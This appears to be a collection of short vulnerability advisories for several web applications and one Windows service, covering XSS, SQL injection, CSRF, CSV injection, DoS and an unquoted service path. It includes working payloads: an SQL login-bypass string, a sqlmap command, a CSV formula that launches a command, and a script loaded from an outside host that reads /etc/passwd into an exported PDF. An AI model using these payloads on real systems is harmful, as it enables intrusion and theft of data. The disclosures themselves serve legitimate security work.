EgavilanMedia User Registration & Login System with Admin Panel 1.0 is vulnerable to Stored Cross Site Scripting. An attacker can inject malicious JavaScript code in the Full Name parameter of the registration page. The malicious code will be stored in the database and will be executed when the Admin Panel is accessed.
An SQL injection vulnerability was discovered in the PHP Student Result Management System. The Admin Login Portal does not properly neutralize special elements in SQL commands, which leaves it vulnerable to SQL injection.
Cross-site request forgery (also known as CSRF) is a web security vulnerability that allows an attacker to induce users to perform actions that they do not intend to perform. An attacker can update any user's account. (Note: the FULL NAME field is also vulnerable to stored XSS, and an attacker can steal the authenticated session of the user.)
SQL injection is a web security vulnerability that allows an attacker to alter the SQL queries made to the database. This can be used to retrieve sensitive information, such as the database structure, tables, columns, and their underlying data. An attacker can gain admin panel access using malicious SQL injection queries. Steps to reproduce: 1. Open the admin login page using the following URL: http://localhost/Under%20Construction/admin/login.php 2. Put the payload below in both fields (User ID and Password). Payload: admin' or '1'='1 3. The server accepted our payload and we bypassed cpanel without any credentials.
This exploit allows an attacker to inject malicious SQL code into the 'id' parameter of the Pharmacy Store Management System 1.0. This can be done with the sqlmap tool, which can be used to identify databases and tables in the system. The command to use is: sqlmap -u 'http://localhost/pharmacy1/admin/edituser?id=1' --dbs --batch
We can create portfolios, export them to PDF and download them. The issue is an HTML injection: if we inject HTML into the portfolio, it is rendered when the portfolio is exported to PDF. Because the rendering runs under the file:// wrapper, we can inject an XMLHttpRequest that requests a local file of our choice, and the content of that file then appears in the downloaded PDF. We cannot inject the XMLHttpRequest directly into the content of the portfolio, as something blocks it, so we have to host a script on our own server and invoke it from the portfolio. We insert this in the portfolio: <script src=host.com/test.js> </script> Script on our server: x=new XMLHttpRequest; x.onload=function(){ document.write(this.responseText) }; x.open("GET","file:///etc/passwd"); x.send(); Finally, we only have to download the PDF, and it will contain the content of the file we requested.
This exploit allows an attacker to cause a denial of service (DoS) by creating a new .txt file with a buffer of 'Z' characters of length 10000 and then copying the content of the file into the Subject title field of the program aSc Timetables 2021.6.2.
Expense Management System is vulnerable to Stored Cross Site Scripting. An attacker can inject malicious JavaScript code into the 'description' parameter of the 'expense_action.php' page. When a victim visits the page, the malicious code will be executed in the victim's browser.
CSV Injection (aka Excel Macro Injection or Formula Injection) exists in the Contact Us feature in Tendenci v12.3.1 via the message field, which is mishandled when exporting to a CSV file. To exploit this vulnerability: 1. Go to the contact us page, enter the payload '=10+20+cmd|' /C calc'!A0' in the message field and submit the form. 2. Log in to the application, go to the Forms section and export the contact us form entries. 3. Click on Export and save the downloaded CSV file. 4. Open the CSV file and allow all popups; our payload is executed (calculator is opened).
An attacker with low privileges can download a malicious executable file to the Intel directory and set it to run with the unquoted service path of the Intel User Notification Service. After the system is rebooted, the malicious executable will be executed with SYSTEM privileges.